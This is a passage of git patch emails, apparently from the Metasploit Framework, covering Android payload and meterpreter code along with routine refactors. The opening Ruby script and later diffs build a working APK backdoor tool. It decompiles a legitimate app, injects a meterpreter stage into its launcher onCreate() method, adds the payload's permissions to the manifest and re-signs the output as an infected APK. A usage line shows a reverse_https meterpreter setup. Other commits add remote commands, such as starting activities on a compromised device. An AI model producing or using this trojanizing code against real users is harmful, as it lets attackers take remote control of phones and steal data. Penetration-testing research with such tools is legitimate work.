- unless category - next - end - for cat in category - categoryname = cat.attribute('name') - if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') - activityname = activityname.to_s - unless activityname.start_with?(package) - activityname = package + activityname - end - return activityname - end - end - end -end - -# If XML parsing of the manifest fails, recursively search -# the smali code for the onCreate() hook and let the user -# pick the injection point - -def scrape_files_for_launcher_activity(tempdir) - smali_files||=[] - Dir.glob("#{tempdir}/original/smali*/**/*.smali") do |file| - checkFile=File.read(file) - if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") - smali_files << file - smalifile = file - activitysmali = checkFile - end - end - i=0 - print "[*] Please choose from one of the following:\n" - smali_files.each{|s_file| - print "[+] Hook point ",i,": ",s_file,"\n" - i+=1 - } - hook=-1 - while (hook < 0 || hook>i) - print "\nHook: " - hook = STDIN.gets.chomp.to_i - end - i=0 - smalifile="" - activitysmali="" - smali_files.each{|s_file| - if (i==hook) - checkFile=File.read(s_file) - smalifile=s_file - activitysmali = checkFile - break - end - i+=1 - } - return [smalifile,activitysmali] -end - -def fix_manifest(tempdir) - payload_permissions=[] - - #Load payload's permissions - File.open("#{tempdir}/payload/AndroidManifest.xml","rb"){|file| - k=File.read(file) - payload_manifest=Nokogiri::XML(k) - permissions = payload_manifest.xpath("//manifest/uses-permission") - for permission in permissions - name=permission.attribute("name") - payload_permissions << name.to_s - end - } - - original_permissions=[] - apk_mani="" - - #Load original apk's permissions - File.open("#{tempdir}/original/AndroidManifest.xml","rb"){|file2| - k=File.read(file2) - apk_mani=k - original_manifest=Nokogiri::XML(k) - permissions = original_manifest.xpath("//manifest/uses-permission") - for permission in permissions - name=permission.attribute("name") - original_permissions << name.to_s - end - } - - #Get permissions that are not in original APK - add_permissions=[] - for permission in payload_permissions - if !(original_permissions.include? permission) - print "[*] Adding #{permission}\n" - add_permissions << permission - end - end - - inject=0 - new_mani="" - #Inject permissions in original APK's manifest - for line in apk_mani.split("\n") - if (line.include? "uses-permission" and inject==0) - for permission in add_permissions - new_mani << ''+"\n" - end - new_mani << line+"\n" - inject=1 - else - new_mani << line+"\n" - end - end - File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts new_mani } -end - -def backdoor_payload(apkfile, raw_payload) - unless apkfile && File.readable?(apkfile) - usage - exit(1) - end - - jarsigner = run_cmd("jarsigner") - unless jarsigner != nil - $stderr.puts "[-] jarsigner not found. If it's not in your PATH, please add it.\n" - exit(1) - end - - apktool = run_cmd("apktool -version") - unless apktool != nil - $stderr.puts "[-] apktool not found. If it's not in your PATH, please add it.\n" - exit(1) - end - - apk_v = Gem::Version.new(apktool) - unless apk_v >= Gem::Version.new('2.0.1') - $stderr.puts "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" - exit(1) - end - - #Create temporary directory where work will be done - tempdir = Dir.mktmpdir - - File.open("#{tempdir}/payload.apk", "wb") {|file| file.puts raw_payload } - FileUtils.cp apkfile, "#{tempdir}/original.apk" - - print "[*] Decompiling original APK..\n" - run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") - print "[*] Decompiling payload APK..\n" - run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") - - f = File.open("#{tempdir}/original/AndroidManifest.xml") - amanifest = Nokogiri::XML(f) - f.close - - print "[*] Locating onCreate() hook..\n" - - launcheractivity = find_launcher_activity(amanifest) - smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" - begin - activitysmali = File.read(smalifile) - rescue Errno::ENOENT - print "[!] Unable to find correct hook automatically\n" - begin - results=scrape_files_for_launcher_activity(tempdir) - smalifile=results[0] - activitysmali=results[1] - rescue - $stderr.puts "[-] Error finding launcher activity. Exiting" - exit(1) - end - end - - print "[*] Copying payload files..\n" - FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") - FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" - activitycreate = ';->onCreate(Landroid/os/Bundle;)V' - payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" - hookedsmali = activitysmali.gsub(activitycreate, payloadhook) - print "[*] Loading ",smalifile," and injecting payload..\n" - File.open(smalifile, "wb") {|file| file.puts hookedsmali } - injected_apk = apkfile.sub('.apk', '_backdoored.apk') - - print "[*] Poisoning the manifest with meterpreter permissions..\n" - fix_manifest(tempdir) - - print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" - run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") - print "[*] Signing #{injected_apk}\n" - run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") - - FileUtils.remove_entry tempdir - - puts "[+] Infected file #{injected_apk} ready.\n" -end - -if __FILE__ == $0 - begin - msfvenom_opts = ARGV[1,ARGV.length] - opts="" - msfvenom_opts.each{|x| - opts+=x - opts+=" " - } - rescue - $stderr.puts "[-] Error parsing msfvenom options. Exiting.\n" - usage - exit(1) - end - - print "[*] Generating msfvenom payload..\n" - msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "..", "msfvenom")) - msfvenom_command = "#{msfvenom_path} -f raw #{opts}" - begin - stdin, stdout, stderr = Open3.popen3(msfvenom_command) - payload = stdout.read - msfvenom_output = stderr.read - backdoor_payload(ARGV[0], payload) - rescue Errno::ENOENT - $stderr.puts msfvenom_output - exit(1) - end - -end - From d2a9aa18d89b1be5055f0597aad96913e3d3f327 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 22 Dec 2015 16:06:01 +0000 Subject: [PATCH 15/71] fix sillyness --- lib/msf/core/payload_generator.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index 11434d52e4..74ee6b6c4e 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb @@ -309,7 +309,7 @@ module Msf raw_payload = generate_java_payload cli_print "Payload size: #{raw_payload.length} bytes" raw_payload - elsif payload.start_with? "android/" + elsif payload.start_with? "android/" and not template.blank? cli_print "Using APK template: #{template}" apk_backdoor = ::Msf::Payload::Apk::ApkBackdoor::new() raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload) From 69b65e7d397ff4aa247629fad508da5cc175f6f8 Mon Sep 17 00:00:00 2001 From: Tim Date: Thu, 24 Dec 2015 09:13:56 +0000 Subject: [PATCH 16/71] fix error handling --- lib/msf/core/payload/apk.rb | 23 ++++++++++------------- 1 file changed, 10 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb index 107d70d5b7..62764370a0 100644 --- a/lib/msf/core/payload/apk.rb +++ b/lib/msf/core/payload/apk.rb @@ -21,13 +21,13 @@ module Msf::Payload::Apk $stderr.puts "[*] #{msg}" end - def print_error(msf='') + def print_error(msg='') $stderr.puts "[-] #{msg}" end def usage - print_error "Usage: #{$0} [target.apk] [msfvenom options]\n" - print_error "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" + print_error "Usage: #{$0} -x [target.apk] [msfvenom options]\n" + print_error "e.g. #{$0} -x messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" end def run_cmd(cmd) @@ -120,25 +120,22 @@ module Msf::Payload::Apk def backdoor_payload(apkfile, raw_payload) unless apkfile && File.readable?(apkfile) usage - exit(1) + raise RuntimeError, "Invalid template: #{apkfile}" end jarsigner = run_cmd("jarsigner") unless jarsigner != nil - print_error("jarsigner not found. If it's not in your PATH, please add it.") - exit(1) + raise RuntimeError, "jarsigner not found. If it's not in your PATH, please add it." end apktool = run_cmd("apktool -version") unless apktool != nil - print_error "apktool not found. If it's not in your PATH, please add it." - exit(1) + raise RuntimeError, "apktool not found. If it's not in your PATH, please add it." end apk_v = Gem::Version.new(apktool) unless apk_v >= Gem::Version.new('2.0.1') - print_error "apktool version #{apk_v} not supported, please download at least version 2.0.1." - exit(1) + raise RuntimeError, "apktool version #{apk_v} not supported, please download at least version 2.0.1." end #Create temporary directory where work will be done @@ -163,8 +160,7 @@ module Msf::Payload::Apk begin activitysmali = File.read(smalifile) rescue Errno::ENOENT - print_status "Unable to find correct hook automatically\n" - exit + raise RuntimeError, "Unable to find hook point in #{apkfile}\n" end print_status "Copying payload files..\n" @@ -185,8 +181,9 @@ module Msf::Payload::Apk run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") outputapk = File.read(injected_apk) - rescue + FileUtils.remove_entry tempdir + outputapk end end From 5d0e868fd6422bafaf102c57398837acac8a46ef Mon Sep 17 00:00:00 2001 From: Tim Date: Thu, 24 Dec 2015 12:21:08 +0000 Subject: [PATCH 17/71] facebook.orca fixes --- lib/msf/core/payload/apk.rb | 46 +++++++++++++++++++++++++------------ 1 file changed, 31 insertions(+), 15 deletions(-) diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb index 62764370a0..7aa9c34bb6 100644 --- a/lib/msf/core/payload/apk.rb +++ b/lib/msf/core/payload/apk.rb @@ -44,7 +44,10 @@ module Msf::Payload::Apk package = amanifest.xpath("//manifest").first['package'] activities = amanifest.xpath("//activity|//activity-alias") for activity in activities - activityname = activity.attribute("name") + activityname = activity.attribute("targetActivity") + unless activityname + activityname = activity.attribute("name") + end category = activity.search('category') unless category next @@ -52,11 +55,11 @@ module Msf::Payload::Apk for cat in category categoryname = cat.attribute('name') if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') - activityname = activityname.to_s - unless activityname.start_with?(package) - activityname = package + activityname + name = activityname.to_s + if name.start_with?('.') + name = package + name end - return activityname + return name end end end @@ -153,22 +156,35 @@ module Msf::Payload::Apk amanifest = Nokogiri::XML(f) f.close - print_status "Locating onCreate() hook..\n" - + print_status "Locating hook point..\n" launcheractivity = find_launcher_activity(amanifest) - smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" - begin - activitysmali = File.read(smalifile) - rescue Errno::ENOENT - raise RuntimeError, "Unable to find hook point in #{apkfile}\n" + unless launcheractivity + raise RuntimeError, "Unable to find hookable activity in #{apkfile}\n" + end + smalifile = "#{tempdir}/original/smali*/" + launcheractivity.gsub(/\./, "/") + ".smali" + smalifiles = Dir.glob(smalifile) + for smalifile in smalifiles + if File.readable?(smalifile) + activitysmali = File.read(smalifile) + end + end + + unless activitysmali + raise RuntimeError, "Unable to find hook point in #{smalifiles}\n" + end + + entrypoint = ';->onCreate(Landroid/os/Bundle;)V' + unless activitysmali.include? entrypoint + raise RuntimeError, "Unable to find onCreate() in #{smalifile}\n" end print_status "Copying payload files..\n" FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" - activitycreate = ';->onCreate(Landroid/os/Bundle;)V' - payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" - hookedsmali = activitysmali.gsub(activitycreate, payloadhook) + + payloadhook = entrypoint + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" + hookedsmali = activitysmali.gsub(entrypoint, payloadhook) + print_status "Loading #{smalifile} and injecting payload..\n" File.open(smalifile, "wb") {|file| file.puts hookedsmali } injected_apk = "#{tempdir}/output.apk" From f48e4363f5b521ee557250e4ad0d8dddeb962321 Mon Sep 17 00:00:00 2001 From: Tim Date: Thu, 7 Jan 2016 09:22:42 +0000 Subject: [PATCH 18/71] activity_start --- .../meterpreter/extensions/android/android.rb | 7 +++++++ .../post/meterpreter/extensions/android/tlv.rb | 3 +-- .../ui/console/command_dispatcher/android.rb | 17 +++++++++++++++-- 3 files changed, 23 insertions(+), 4 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index 931b591708..a98ea5bd28 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb @@ -242,6 +242,13 @@ class Android < Extension response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value end + def activity_start(uri) + request = Packet.create_request('activity_start') + request.add_tlv(TLV_TYPE_URI_STRING, uri) + response = client.send_request(request) + response + end + def send_sms(dest, body, dr) request = Packet.create_request('send_sms') request.add_tlv(TLV_TYPE_SMS_ADDRESS, dest) diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb index 99f269327d..9f434cfffa 100644 --- a/lib/rex/post/meterpreter/extensions/android/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb @@ -76,8 +76,7 @@ TLV_TYPE_CELL_BASE_LONG = TLV_META_TYPE_UINT | (TLV_EXTENSIONS TLV_TYPE_CELL_NET_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9073) TLV_TYPE_CELL_SYSTEM_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9074) - - +TLV_TYPE_URI_STRING = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9101) end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index 8030c3329c..d72044d9ec 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -29,7 +29,8 @@ class Console::CommandDispatcher::Android 'device_shutdown' => 'Shutdown device', 'send_sms' => 'Sends SMS from target session', 'wlan_geolocate' => 'Get current lat-long using WLAN information', - 'interval_collect' => 'Manage interval collection capabilities' + 'interval_collect' => 'Manage interval collection capabilities', + 'activity_start' => 'Start an Android activity from a Uri string' } reqs = { @@ -41,7 +42,8 @@ class Console::CommandDispatcher::Android 'device_shutdown' => ['device_shutdown'], 'send_sms' => ['send_sms'], 'wlan_geolocate' => ['wlan_geolocate'], - 'interval_collect' => ['interval_collect'] + 'interval_collect' => ['interval_collect'], + 'activity_start' => ['activity_start'] } # Ensure any requirements of the command are met @@ -528,6 +530,17 @@ class Console::CommandDispatcher::Android end end + def cmd_activity_start(*args) + if (args.length < 1) + print_line("Usage: activity_start \n") + print_line("Start an Android activity from a uri") + return + end + + uri = args[0] + client.android.activity_start(uri) + end + # # Name for this dispatcher # From c76389629abd913edb6886af404cd442d9591d20 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 12 Jan 2016 07:49:37 +0000 Subject: [PATCH 19/71] receive startActivity result --- lib/rex/post/meterpreter/extensions/android/android.rb | 2 +- lib/rex/post/meterpreter/extensions/android/tlv.rb | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index a98ea5bd28..32cc0f9af7 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb @@ -246,7 +246,7 @@ class Android < Extension request = Packet.create_request('activity_start') request.add_tlv(TLV_TYPE_URI_STRING, uri) response = client.send_request(request) - response + response.get_tlv(TLV_TYPE_ACTIVITY_START_RESULT).value end def send_sms(dest, body, dr) diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb index 9f434cfffa..54cfa1488b 100644 --- a/lib/rex/post/meterpreter/extensions/android/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb @@ -77,6 +77,7 @@ TLV_TYPE_CELL_NET_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS TLV_TYPE_CELL_SYSTEM_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9074) TLV_TYPE_URI_STRING = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9101) +TLV_TYPE_ACTIVITY_START_RESULT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9102) end end From 1f61eb50bedf6494d6b3867a12e1141e1239b153 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 14 Jan 2016 09:09:29 -0600 Subject: [PATCH 20/71] Sort methods --- lib/msf/core/exploit/tcp.rb | 66 ++++++++++++++++++------------------- 1 file changed, 33 insertions(+), 33 deletions(-) diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb index f4a6daef6c..7c342a3a03 100644 --- a/lib/msf/core/exploit/tcp.rb +++ b/lib/msf/core/exploit/tcp.rb @@ -82,11 +82,6 @@ module Exploit::Remote::Tcp ) end - # Returns the rhost:rport - def peer - "#{rhost}:#{rport}" - end - # # Establishes a TCP connection to the specified RHOST/RPORT # @@ -207,17 +202,24 @@ module Exploit::Remote::Tcp ## # - # Returns the target host + # Returns the local host for outgoing connections # - def rhost - datastore['RHOST'] + def chost + datastore['CHOST'] end # - # Returns the remote port + # Returns the TCP connection timeout # - def rport - datastore['RPORT'] + def connect_timeout + datastore['ConnectTimeout'] + end + + # + # Returns the local port for outgoing connections + # + def cport + datastore['CPORT'] end # @@ -234,18 +236,30 @@ module Exploit::Remote::Tcp datastore['LPORT'] end - # - # Returns the local host for outgoing connections - # - def chost - datastore['CHOST'] + # Returns the rhost:rport + def peer + "#{rhost}:#{rport}" end # - # Returns the local port for outgoing connections + # Returns the proxy configuration # - def cport - datastore['CPORT'] + def proxies + datastore['Proxies'] + end + + # + # Returns the target host + # + def rhost + datastore['RHOST'] + end + + # + # Returns the remote port + # + def rport + datastore['RPORT'] end # @@ -262,20 +276,6 @@ module Exploit::Remote::Tcp datastore['SSLVersion'] end - # - # Returns the proxy configuration - # - def proxies - datastore['Proxies'] - end - - # - # Returns the TCP connection timeout - # - def connect_timeout - datastore['ConnectTimeout'] - end - # # Returns the SSL certification verification mechanism # From a7869975d8b65cb85ec6509a6e98530c943be541 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 14 Jan 2016 10:04:23 -0600 Subject: [PATCH 21/71] Remove useless variable --- lib/msf/core/module/ui/message.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/module/ui/message.rb b/lib/msf/core/module/ui/message.rb index 7370ded212..bf4d228abc 100644 --- a/lib/msf/core/module/ui/message.rb +++ b/lib/msf/core/module/ui/message.rb @@ -13,11 +13,11 @@ module Msf::Module::UI::Message end def print_prefix - ret = '' + prefix = '' if (datastore['TimestampOutput'] =~ /^(t|y|1)/i) || ( framework && framework.datastore['TimestampOutput'] =~ /^(t|y|1)/i ) - prefix = "[#{Time.now.strftime("%Y.%m.%d-%H:%M:%S")}] " + prefix << "[#{Time.now.strftime("%Y.%m.%d-%H:%M:%S")}] " xn ||= datastore['ExploitNumber'] xn ||= framework.datastore['ExploitNumber'] @@ -25,9 +25,8 @@ module Msf::Module::UI::Message prefix << "[%04d] " % xn end - ret = prefix end - ret + prefix end def print_status(msg='') @@ -37,4 +36,4 @@ module Msf::Module::UI::Message def print_warning(msg='') super(print_prefix + msg) end -end \ No newline at end of file +end From 6c2391ed0da649d73a1e63c60f3f0744c85583b1 Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 19 Jan 2016 15:37:10 +1000 Subject: [PATCH 22/71] Fix typo in random xor key generator --- lib/rex/post/meterpreter/packet.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb index 423f8880d2..36ae8e8ed8 100644 --- a/lib/rex/post/meterpreter/packet.rb +++ b/lib/rex/post/meterpreter/packet.rb @@ -675,8 +675,8 @@ class Packet < GroupTlv raw = super xor_key = rand(254) + 1 xor_key |= (rand(254) + 1) << 8 - xor_key |= (rand(255) + 1) << 16 - xor_key |= (rand(255) + 1) << 24 + xor_key |= (rand(254) + 1) << 16 + xor_key |= (rand(254) + 1) << 24 result = [xor_key].pack('N') + xor_bytes(xor_key, raw) result end From 0f7e3e954e6f16b810c590ced1277aedead36756 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 20 Jan 2016 13:44:18 -0600 Subject: [PATCH 23/71] HttpServer's print prefix with... wait for it... print_prefix --- lib/msf/core/exploit.rb | 4 +- lib/msf/core/exploit/http/server.rb | 59 +++-------------------------- 2 files changed, 8 insertions(+), 55 deletions(-) diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb index e2d2bbc5d1..7e36ad1a80 100644 --- a/lib/msf/core/exploit.rb +++ b/lib/msf/core/exploit.rb @@ -649,14 +649,14 @@ class Exploit < Msf::Module # Returns true if the exploit has an aggressive stance. # def aggressive? - (stance == Stance::Aggressive) + (stance == Stance::Aggressive || stance.include?(Stance::Aggressive)) end # # Returns if the exploit has a passive stance. # def passive? - (stance == Stance::Passive) + (stance == Stance::Passive || stance.include?(Stance::Passive)) end # diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 6b58eb8a4a..d500a1b336 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -72,60 +72,13 @@ module Exploit::Remote::HttpServer Thread.current[:cli] = cli end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_line(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super + def print_prefix + if cli && !aggressive? + super + "#{cli.peerhost.ljust(16)} #{self.shortname} - " + else + super + end end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_status(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_good(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_error(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - - # - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_warning(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_line(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_status(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_good(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_error(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_warning(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # # Ensures that gzip can be used. If not, an exception is generated. The From ac0b489a90d112287825ec8e96667affb96882d8 Mon Sep 17 00:00:00 2001 From: OJ Date: Thu, 21 Jan 2016 10:28:38 +1000 Subject: [PATCH 24/71] Revert bad merge and include expect calls --- spec/lib/rex/post/meterpreter/packet_parser_spec.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb index 8610f5d3f4..1497ebaa9e 100644 --- a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb +++ b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb @@ -19,9 +19,9 @@ RSpec.describe Rex::Post::Meterpreter::PacketParser do end it "should initialise with expected defaults" do - parser.send(:raw).to eq "" - parser.send(:hdr_length_left).to eq 12 - parser.send(:payload_length_left).to eq 0 + expect(parser.send(:raw)).to eq "" + expect(parser.send(:hdr_length_left)).to eq 12 + expect(parser.send(:payload_length_left)).to eq 0 end it "should parse valid raw data into a packet object" do From 0134161c1ba46e11a760ced9f3024e617d05b22a Mon Sep 17 00:00:00 2001 From: OJ Date: Mon, 25 Jan 2016 22:15:13 +1000 Subject: [PATCH 25/71] Fix another typo --- lib/rex/post/meterpreter/packet.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb index 36ae8e8ed8..372324381f 100644 --- a/lib/rex/post/meterpreter/packet.rb +++ b/lib/rex/post/meterpreter/packet.rb @@ -693,7 +693,7 @@ class Packet < GroupTlv end # - # Xora set of bytes with a given DWORD xor key. + # Xor a set of bytes with a given DWORD xor key. # def xor_bytes(xor_key, bytes) result = '' From 69d9ff7958a636a6c05c855501cd9d10fe881d85 Mon Sep 17 00:00:00 2001 From: OJ Date: Mon, 25 Jan 2016 22:32:20 +1000 Subject: [PATCH 26/71] Add an extended mode to the session list --- lib/msf/base/serializer/readable_text.rb | 12 +++++- lib/msf/ui/console/command_dispatcher/core.rb | 42 ++++++++++--------- 2 files changed, 34 insertions(+), 20 deletions(-) diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index e912cbb6f5..5b20981a9c 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb @@ -524,6 +524,7 @@ class ReadableText def self.dump_sessions(framework, opts={}) ids = (opts[:session_ids] || framework.sessions.keys).sort verbose = opts[:verbose] || false + extended = opts[:extended] || false indent = opts[:indent] || DefaultIndent col = opts[:col] || DefaultColumnWrap @@ -536,6 +537,7 @@ class ReadableText 'Information', 'Connection' ] + columns << 'Checkin?' if extended tbl = Rex::Ui::Text::Table.new( 'Indent' => indent, @@ -552,10 +554,18 @@ class ReadableText end row = [ session.sid.to_s, session.type.to_s, sinfo, session.tunnel_to_s + " (#{session.session_host})" ] - if session.respond_to? :platform + if session.respond_to?(:platform) row[1] << (" " + session.platform) end + if extended + if session.respond_to?(:last_checkin) && session.last_checkin + row << "#{(Time.now.to_i - session.last_checkin.to_i)}s ago" + else + row << '?' + end + end + tbl << row } diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index c76bd76923..e129744ff3 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -34,18 +34,19 @@ class Core # Session command options @@sessions_opts = Rex::Parser::Arguments.new( - "-c" => [ true, "Run a command on the session given with -i, or all"], - "-h" => [ false, "Help banner" ], - "-i" => [ true, "Interact with the supplied session ID" ], - "-l" => [ false, "List all active sessions" ], - "-v" => [ false, "List verbose fields" ], - "-q" => [ false, "Quiet mode" ], - "-k" => [ true, "Terminate sessions by session ID and/or range" ], - "-K" => [ false, "Terminate all sessions" ], - "-s" => [ true, "Run a script on the session given with -i, or all"], - "-r" => [ false, "Reset the ring buffer for the session given with -i, or all"], - "-u" => [ true, "Upgrade a shell to a meterpreter session on many platforms" ], - "-t" => [ true, "Set a response timeout (default: 15)"]) + "-c" => [ true, "Run a command on the session given with -i, or all" ], + "-h" => [ false, "Help banner" ], + "-i" => [ true, "Interact with the supplied session ID " ], + "-l" => [ false, "List all active sessions" ], + "-v" => [ false, "List extended fields" ], + "-vv" => [ false, "Render in verbose mode" ], + "-q" => [ false, "Quiet mode" ], + "-k" => [ true, "Terminate sessions by session ID and/or range" ], + "-K" => [ false, "Terminate all sessions" ], + "-s" => [ true, "Run a script on the session given with -i, or all" ], + "-r" => [ false, "Reset the ring buffer for the session given with -i, or all" ], + "-u" => [ true, "Upgrade a shell to a meterpreter session on many platforms" ], + "-t" => [ true, "Set a response timeout (default: 15)" ]) @@jobs_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help banner." ], @@ -1757,12 +1758,13 @@ class Core # def cmd_sessions(*args) begin - method = nil - quiet = false - verbose = false - sid = nil - cmds = [] - script = nil + method = nil + quiet = false + extended = false + verbose = false + sid = nil + cmds = [] + script = nil reset_ring = false response_timeout = 15 @@ -1780,6 +1782,8 @@ class Core method = 'cmd' cmds << val if val when "-v" + extended = true + when "-vv" verbose = true # Do something with the supplied session identifier instead of # all sessions. @@ -2041,7 +2045,7 @@ class Core end when 'list',nil print_line - print(Serializer::ReadableText.dump_sessions(framework, :verbose => verbose)) + print(Serializer::ReadableText.dump_sessions(framework, :extended => extended, :verbose => verbose)) print_line end From 537c7e790e030329c8052c188cc6450cd09001e3 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 28 Jan 2016 12:51:20 -0600 Subject: [PATCH 27/71] Use vprint_status instead of reimplementing it --- lib/msf/core/exploit/smtp_deliver.rb | 18 ++++++------------ 1 file changed, 6 insertions(+), 12 deletions(-) diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb index a4900e8b1c..9ff8693723 100644 --- a/lib/msf/core/exploit/smtp_deliver.rb +++ b/lib/msf/core/exploit/smtp_deliver.rb @@ -71,7 +71,7 @@ module Exploit::Remote::SMTPDeliver # This method currently only knows about PLAIN authentication. # def connect_login(global = true) - print_verbose("Connecting 